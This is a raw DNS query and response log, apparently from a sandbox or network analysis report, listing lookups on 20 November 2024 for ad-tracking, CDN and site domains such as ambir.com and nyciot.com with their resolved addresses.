                                                                                                                                                                                              Nov 20, 2024 21:28:39.183540106 CET192.168.2.51.1.1.10x795bStandard query (0)x.bidswitch.net65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.196317911 CET192.168.2.51.1.1.10x6100Standard query (0)pixel.tapad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.196485996 CET192.168.2.51.1.1.10x1ee5Standard query (0)pixel.tapad.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.338144064 CET192.168.2.51.1.1.10xc864Standard query (0)cm.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.338280916 CET192.168.2.51.1.1.10x2994Standard query (0)cm.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.340370893 CET192.168.2.51.1.1.10x75d1Standard query (0)dsum-sec.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.340647936 CET192.168.2.51.1.1.10xb1d8Standard query (0)dsum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.870793104 CET192.168.2.51.1.1.10x5b78Standard query (0)x.adroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.871402025 CET192.168.2.51.1.1.10x89efStandard query (0)x.adroll.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:41.261471987 CET192.168.2.51.1.1.10x7b6Standard query (0)idsync.rlcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:41.262377977 CET192.168.2.51.1.1.10x4af5Standard query (0)idsync.rlcdn.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:41.775392056 CET192.168.2.51.1.1.10x2678Standard query (0)pixel.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:41.775587082 CET192.168.2.51.1.1.10x7cd9Standard query (0)pixel.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:42.066817999 CET192.168.2.51.1.1.10xd9aeStandard query (0)x.adroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:42.066955090 CET192.168.2.51.1.1.10x9fa0Standard query (0)x.adroll.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:42.854963064 CET192.168.2.51.1.1.10xb321Standard query (0)match.adsrvr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:42.855195045 CET192.168.2.51.1.1.10x4feStandard query (0)match.adsrvr.org65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:43.049109936 CET192.168.2.51.1.1.10xea90Standard query (0)dsum-sec.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:43.049249887 CET192.168.2.51.1.1.10xdac1Standard query (0)dsum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:43.251048088 CET192.168.2.51.1.1.10x75efStandard query (0)x.bidswitch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:43.251185894 CET192.168.2.51.1.1.10x3454Standard query (0)x.bidswitch.net65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:44.550313950 CET192.168.2.51.1.1.10x5609Standard query (0)pixel.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:44.550523996 CET192.168.2.51.1.1.10x81cbStandard query (0)pixel.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:44.658085108 CET192.168.2.51.1.1.10xf609Standard query (0)api.olark.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:44.658453941 CET192.168.2.51.1.1.10x959cStandard query (0)api.olark.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:44.930289030 CET192.168.2.51.1.1.10x6cfcStandard query (0)pippio.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:44.931027889 CET192.168.2.51.1.1.10xeb63Standard query (0)pippio.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:45.589823008 CET192.168.2.51.1.1.10xdfcfStandard query (0)us-u.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:45.590337992 CET192.168.2.51.1.1.10x4eeStandard query (0)us-u.openx.net65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:45.819369078 CET192.168.2.51.1.1.10x272dStandard query (0)sync.outbrain.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:45.819525003 CET192.168.2.51.1.1.10xe047Standard query (0)sync.outbrain.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:46.626699924 CET192.168.2.51.1.1.10xc989Standard query (0)api.olark.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:46.627147913 CET192.168.2.51.1.1.10x4455Standard query (0)api.olark.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:46.829969883 CET192.168.2.51.1.1.10xeb7cStandard query (0)px.ads.linkedin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:46.830208063 CET192.168.2.51.1.1.10xa5f8Standard query (0)px.ads.linkedin.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:47.156172037 CET192.168.2.51.1.1.10xd30Standard query (0)image2.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:47.156455040 CET192.168.2.51.1.1.10x8490Standard query (0)image2.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:47.281152964 CET192.168.2.51.1.1.10xb4daStandard query (0)ups.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:47.281392097 CET192.168.2.51.1.1.10xd70aStandard query (0)ups.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:47.736071110 CET192.168.2.51.1.1.10xbfdaStandard query (0)log.olark.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:47.736433983 CET192.168.2.51.1.1.10x169bStandard query (0)log.olark.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:47.921097040 CET192.168.2.51.1.1.10x6caaStandard query (0)sync.outbrain.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:47.921528101 CET192.168.2.51.1.1.10xd317Standard query (0)sync.outbrain.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:48.772089958 CET192.168.2.51.1.1.10x70cfStandard query (0)pixel.tapad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:48.772258043 CET192.168.2.51.1.1.10xacc4Standard query (0)pixel.tapad.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:49.123245955 CET192.168.2.51.1.1.10xe989Standard query (0)us-u.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:49.123385906 CET192.168.2.51.1.1.10x6a36Standard query (0)us-u.openx.net65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:49.915527105 CET192.168.2.51.1.1.10x3b55Standard query (0)log.olark.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:49.915666103 CET192.168.2.51.1.1.10x984fStandard query (0)log.olark.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:49.916673899 CET192.168.2.51.1.1.10xa6b5Standard query (0)image2.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:49.916898012 CET192.168.2.51.1.1.10x5bcbStandard query (0)image2.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.245368958 CET192.168.2.51.1.1.10x92aeStandard query (0)px.ads.linkedin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.245589018 CET192.168.2.51.1.1.10x402bStandard query (0)px.ads.linkedin.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.371068001 CET192.168.2.51.1.1.10xb902Standard query (0)sync.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.371392012 CET192.168.2.51.1.1.10x1399Standard query (0)sync.taboola.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.376553059 CET192.168.2.51.1.1.10x14f7Standard query (0)eb2.3lift.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.376719952 CET192.168.2.51.1.1.10xbb6eStandard query (0)eb2.3lift.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.423629045 CET192.168.2.51.1.1.10x36f0Standard query (0)ib.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.423780918 CET192.168.2.51.1.1.10xd01Standard query (0)ib.adnxs.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:54.302280903 CET192.168.2.51.1.1.10x1247Standard query (0)x.adroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:54.302418947 CET192.168.2.51.1.1.10xef64Standard query (0)x.adroll.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:55.943491936 CET192.168.2.51.1.1.10x81d7Standard query (0)eb2.3lift.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:55.943639040 CET192.168.2.51.1.1.10x1d63Standard query (0)eb2.3lift.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:55.962939024 CET192.168.2.51.1.1.10xd4b2Standard query (0)ib.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:55.963073015 CET192.168.2.51.1.1.10xb953Standard query (0)ib.adnxs.com65IN (0x0001)false
                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                              Nov 20, 2024 21:28:11.450514078 CET1.1.1.1192.168.2.50xa244No error (0)ambir.com141.193.213.10A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:11.450514078 CET1.1.1.1192.168.2.50xa244No error (0)ambir.com141.193.213.11A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:13.588519096 CET1.1.1.1192.168.2.50xd27cNo error (0)platform-api.sharethis.com13.227.8.5A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:13.588519096 CET1.1.1.1192.168.2.50xd27cNo error (0)platform-api.sharethis.com13.227.8.55A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:13.588519096 CET1.1.1.1192.168.2.50xd27cNo error (0)platform-api.sharethis.com13.227.8.62A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:13.588519096 CET1.1.1.1192.168.2.50xd27cNo error (0)platform-api.sharethis.com13.227.8.48A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:13.607007027 CET1.1.1.1192.168.2.50x72d0No error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:13.607708931 CET1.1.1.1192.168.2.50x6d5cNo error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:13.607708931 CET1.1.1.1192.168.2.50x6d5cNo error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:14.067748070 CET1.1.1.1192.168.2.50x5e6eNo error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:14.067936897 CET1.1.1.1192.168.2.50xb5dNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:16.113667011 CET1.1.1.1192.168.2.50x7fe4No error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:16.116337061 CET1.1.1.1192.168.2.50x5fc6No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:16.116337061 CET1.1.1.1192.168.2.50x5fc6No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:18.757013083 CET1.1.1.1192.168.2.50x3551No error (0)nyciot.com45.61.136.196A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:18.771820068 CET1.1.1.1192.168.2.50x743No error (0)forms.zohopublic.comzpublic.zohopublic.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:18.798892021 CET1.1.1.1192.168.2.50x7ebcNo error (0)ambir.com141.193.213.11A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:18.798892021 CET1.1.1.1192.168.2.50x7ebcNo error (0)ambir.com141.193.213.10A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:18.852787018 CET1.1.1.1192.168.2.50x9d9bNo error (0)forms.zohopublic.comzpublic.zohopublic.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:18.852787018 CET1.1.1.1192.168.2.50x9d9bNo error (0)zpublic.zohopublic.com136.143.182.97A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:21.267540932 CET1.1.1.1192.168.2.50x6678No error (0)static.zohocdn.comh2-stratus.zohocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:21.267540932 CET1.1.1.1192.168.2.50x6678No error (0)h2-stratus.zohocdn.com199.67.80.86A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:21.393635035 CET1.1.1.1192.168.2.50xe334No error (0)static.zohocdn.comh2-stratus.zohocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:21.692822933 CET1.1.1.1192.168.2.50xc984No error (0)s.adroll.comd1qug1xf2dk5z6.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:21.692822933 CET1.1.1.1192.168.2.50xc984No error (0)d1qug1xf2dk5z6.cloudfront.net18.165.220.61A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:21.692822933 CET1.1.1.1192.168.2.50xc984No error (0)d1qug1xf2dk5z6.cloudfront.net18.165.220.96A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:21.692822933 CET1.1.1.1192.168.2.50xc984No error (0)d1qug1xf2dk5z6.cloudfront.net18.165.220.92A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:21.692822933 CET1.1.1.1192.168.2.50xc984No error (0)d1qug1xf2dk5z6.cloudfront.net18.165.220.67A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:21.858304024 CET1.1.1.1192.168.2.50xad06No error (0)s.adroll.comd1qug1xf2dk5z6.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:21.881922007 CET1.1.1.1192.168.2.50x43f9No error (0)www.cloudflare.com104.16.123.96A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:21.881922007 CET1.1.1.1192.168.2.50x43f9No error (0)www.cloudflare.com104.16.124.96A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:21.882848978 CET1.1.1.1192.168.2.50x6e96No error (0)www.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:21.885014057 CET1.1.1.1192.168.2.50x9225No error (0)nyciot.com45.61.136.196A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:22.211189032 CET1.1.1.1192.168.2.50x732fNo error (0)analytics.google.comanalytics-alv.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:22.211189032 CET1.1.1.1192.168.2.50x732fNo error (0)analytics-alv.google.com216.239.36.181A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:22.211189032 CET1.1.1.1192.168.2.50x732fNo error (0)analytics-alv.google.com216.239.34.181A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:22.211189032 CET1.1.1.1192.168.2.50x732fNo error (0)analytics-alv.google.com216.239.38.181A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:22.211189032 CET1.1.1.1192.168.2.50x732fNo error (0)analytics-alv.google.com216.239.32.181A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:22.214798927 CET1.1.1.1192.168.2.50x6775No error (0)analytics.google.comanalytics-alv.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:22.244085073 CET1.1.1.1192.168.2.50xf4d6No error (0)td.doubleclick.net172.217.17.66A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:23.808226109 CET1.1.1.1192.168.2.50x2718No error (0)www.cloudflare.com104.16.124.96A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:23.808226109 CET1.1.1.1192.168.2.50x2718No error (0)www.cloudflare.com104.16.123.96A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:23.809098005 CET1.1.1.1192.168.2.50xa8fNo error (0)www.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:24.282938957 CET1.1.1.1192.168.2.50x6eaaNo error (0)accounts.zoho.com136.143.190.100A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:25.180071115 CET1.1.1.1192.168.2.50xeb2dNo error (0)sdks.shopifycdn.com185.146.173.20A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:25.349970102 CET1.1.1.1192.168.2.50xd597No error (0)webfonts.zohowebstatic.comd28140lin2gosl.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:25.355421066 CET1.1.1.1192.168.2.50x6939No error (0)webfonts.zohowebstatic.comd28140lin2gosl.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:25.355421066 CET1.1.1.1192.168.2.50x6939No error (0)d28140lin2gosl.cloudfront.net108.158.75.29A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:25.355421066 CET1.1.1.1192.168.2.50x6939No error (0)d28140lin2gosl.cloudfront.net108.158.75.129A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:25.355421066 CET1.1.1.1192.168.2.50x6939No error (0)d28140lin2gosl.cloudfront.net108.158.75.28A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:25.355421066 CET1.1.1.1192.168.2.50x6939No error (0)d28140lin2gosl.cloudfront.net108.158.75.18A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:25.617005110 CET1.1.1.1192.168.2.50x20daNo error (0)googleads.g.doubleclick.net142.250.181.34A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:25.617073059 CET1.1.1.1192.168.2.50x4fa7No error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:25.711811066 CET1.1.1.1192.168.2.50x6a88No error (0)acsbapp.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:25.713012934 CET1.1.1.1192.168.2.50x3099No error (0)acsbapp.com104.22.1.204A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:25.713012934 CET1.1.1.1192.168.2.50x3099No error (0)acsbapp.com172.67.11.155A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:25.713012934 CET1.1.1.1192.168.2.50x3099No error (0)acsbapp.com104.22.0.204A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.167007923 CET1.1.1.1192.168.2.50x832No error (0)static.olark.comstatic.wac.5025.rhocdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.167007923 CET1.1.1.1192.168.2.50x832No error (0)static.wac.5025.rhocdn.netfp2e04.wac.5025.rhocdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.167007923 CET1.1.1.1192.168.2.50x832No error (0)fp2e04.wac.5025.rhocdn.netfp2e04.wac.rhocdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.167007923 CET1.1.1.1192.168.2.50x832No error (0)fp2e04.wac.rhocdn.net192.229.233.34A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.257143974 CET1.1.1.1192.168.2.50x3a72No error (0)static.olark.comstatic.wac.5025.rhocdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.257143974 CET1.1.1.1192.168.2.50x3a72No error (0)static.wac.5025.rhocdn.netfp2e04.wac.5025.rhocdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.257143974 CET1.1.1.1192.168.2.50x3a72No error (0)fp2e04.wac.5025.rhocdn.netfp2e04.wac.rhocdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.453314066 CET1.1.1.1192.168.2.50x96c7No error (0)s.adroll.comd1qug1xf2dk5z6.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.453314066 CET1.1.1.1192.168.2.50x96c7No error (0)d1qug1xf2dk5z6.cloudfront.net18.165.220.61A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.453314066 CET1.1.1.1192.168.2.50x96c7No error (0)d1qug1xf2dk5z6.cloudfront.net18.165.220.96A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.453314066 CET1.1.1.1192.168.2.50x96c7No error (0)d1qug1xf2dk5z6.cloudfront.net18.165.220.92A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.453314066 CET1.1.1.1192.168.2.50x96c7No error (0)d1qug1xf2dk5z6.cloudfront.net18.165.220.67A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.453332901 CET1.1.1.1192.168.2.50x7c8fNo error (0)s.adroll.comd1qug1xf2dk5z6.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.484306097 CET1.1.1.1192.168.2.50x12daNo error (0)accounts.zoho.com136.143.190.100A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.717740059 CET1.1.1.1192.168.2.50xe8bdNo error (0)static.zohocdn.comh2-stratus.zohocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.717740059 CET1.1.1.1192.168.2.50xe8bdNo error (0)h2-stratus.zohocdn.com199.67.80.86A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.718089104 CET1.1.1.1192.168.2.50xbfaNo error (0)static.zohocdn.comh2-stratus.zohocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:27.779995918 CET1.1.1.1192.168.2.50xc578No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:27.779995918 CET1.1.1.1192.168.2.50xc578No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:27.780271053 CET1.1.1.1192.168.2.50x88b5No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:27.782339096 CET1.1.1.1192.168.2.50x3959No error (0)use.fontawesome.comuse.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:27.782361031 CET1.1.1.1192.168.2.50x9865No error (0)use.fontawesome.comuse.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:27.789669037 CET1.1.1.1192.168.2.50xada0No error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:27.790540934 CET1.1.1.1192.168.2.50x1d60No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:28.193540096 CET1.1.1.1192.168.2.50x5fe6No error (0)sdks.shopifycdn.com185.146.173.20A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:29.416671038 CET1.1.1.1192.168.2.50xa406No error (0)googleads.g.doubleclick.net172.217.17.34A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:29.416699886 CET1.1.1.1192.168.2.50x901bNo error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:29.419904947 CET1.1.1.1192.168.2.50x4470No error (0)acsbapp.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:29.420334101 CET1.1.1.1192.168.2.50x4ec4No error (0)acsbapp.com172.67.11.155A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:29.420334101 CET1.1.1.1192.168.2.50x4ec4No error (0)acsbapp.com104.22.1.204A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:29.420334101 CET1.1.1.1192.168.2.50x4ec4No error (0)acsbapp.com104.22.0.204A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:29.424521923 CET1.1.1.1192.168.2.50xece9No error (0)static.olark.comstatic.wac.5025.rhocdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:29.424521923 CET1.1.1.1192.168.2.50xece9No error (0)static.wac.5025.rhocdn.netfp2e04.wac.5025.rhocdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:29.424521923 CET1.1.1.1192.168.2.50xece9No error (0)fp2e04.wac.5025.rhocdn.netfp2e04.wac.rhocdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:29.424521923 CET1.1.1.1192.168.2.50xece9No error (0)fp2e04.wac.rhocdn.net192.229.233.34A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:29.424592972 CET1.1.1.1192.168.2.50x386No error (0)static.olark.comstatic.wac.5025.rhocdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:29.424592972 CET1.1.1.1192.168.2.50x386No error (0)static.wac.5025.rhocdn.netfp2e04.wac.5025.rhocdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:29.424592972 CET1.1.1.1192.168.2.50x386No error (0)fp2e04.wac.5025.rhocdn.netfp2e04.wac.rhocdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:30.431289911 CET1.1.1.1192.168.2.50x6ca5No error (0)d.adroll.comadserver-vpc-alb-3-255995556.ap-southeast-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:30.431929111 CET1.1.1.1192.168.2.50xc451No error (0)d.adroll.comadserver-vpc-alb-0-1210614323.ap-southeast-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:30.431929111 CET1.1.1.1192.168.2.50xc451No error (0)adserver-vpc-alb-0-1210614323.ap-southeast-1.elb.amazonaws.com54.255.252.168A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:30.431929111 CET1.1.1.1192.168.2.50xc451No error (0)adserver-vpc-alb-0-1210614323.ap-southeast-1.elb.amazonaws.com52.220.250.182A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:30.575645924 CET1.1.1.1192.168.2.50x4f68No error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:30.576257944 CET1.1.1.1192.168.2.50x35e8No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:31.576451063 CET1.1.1.1192.168.2.50xfe44No error (0)stats.g.doubleclick.net66.102.1.155A (IP address)IN (0x0001)false
